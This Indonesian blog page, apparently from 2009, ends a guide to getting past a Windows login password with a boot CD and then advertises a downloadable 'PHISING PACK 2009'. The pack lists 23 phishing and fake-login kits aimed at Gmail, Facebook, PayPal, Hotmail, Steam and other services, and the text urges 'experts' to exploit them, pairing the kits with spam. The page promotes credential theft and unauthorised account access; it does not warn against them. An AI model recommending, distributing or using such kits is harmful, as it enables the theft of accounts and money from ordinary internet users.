  11. Proses akan dilanjutkan, kemudian akan ditampilkan kembali langkah tiga yang telah kita lalui. Untuk keluar dan kembali ke jendela login tekan Alt + Ctrl + Del. Maka komputer akan merestart ulang. Jangan lupa keluarkan CD boot PNH dari CD room.
  12. Akhirnya kita bisa melihat user login yang tadinya terpassword telah terbuka dan kita bisa masuk dengan tanpa password tentunya. Selamat mencoba...!
Readmore »

Kumpulan phising dan fake login pupuler 2009


Teknik Phising menggunakan metode fake login atau halaman jebakan adalah teknik hacking populer untuk menjerat username dan password. Teknik yang membutuhkan pendekatan psikologis ini sangat kental dengan Spam. Keduanya memang seperti api dan bensin, benar-benar cocok kalau dipasangkan. Bahaya phising, fake login dan spam sudah tidak diragukan lagi. Banyak sekali korban berjatuhan terutama bagi pengguna baru di internet. Bagi yang ingin mengoleksi script fake login dan mempelajari teknik phising lebih detail anda bisa mendownload koleksi phising dan fake login pada akhir artikel ini.



Bagi yang merasa expert untuk memanfaatkan fakelogin dan phising secara mendalam, saya berikan referensi phising dan fakelogin dalam PHISING PACK 2009. Berikut daftar phising yang ada di dalamnya:
  1. AnonymousMailer
  2. Phisher Maker!
  3. Jiffy Gmail Account Creator
  4. Tarantula
  5. RapidExtract
  6. IP Hider Pack
  7. Steam Phiser
  8. Rapidshare Phiser
  9. Friendster Phiser
  10. Gmail Phisher
  11. Habbo Phisher
  12. Facebook Phisher
  13. Photobucket Phisher
  14. XboxLive Phisher
  15. AIM Phisher
  16. GaiaOnline Phisher
  17. IMVU Phisher
  18. AstaTalk Phisher
  19. Warez-bb Phisher
  20. Hotmail Phisher
  21. Paypal Phisher
  22. Runescape Phisher
  23. youtube Phisher
  24. dan lebih banyak lagi
 
 
idecapung
Readmore »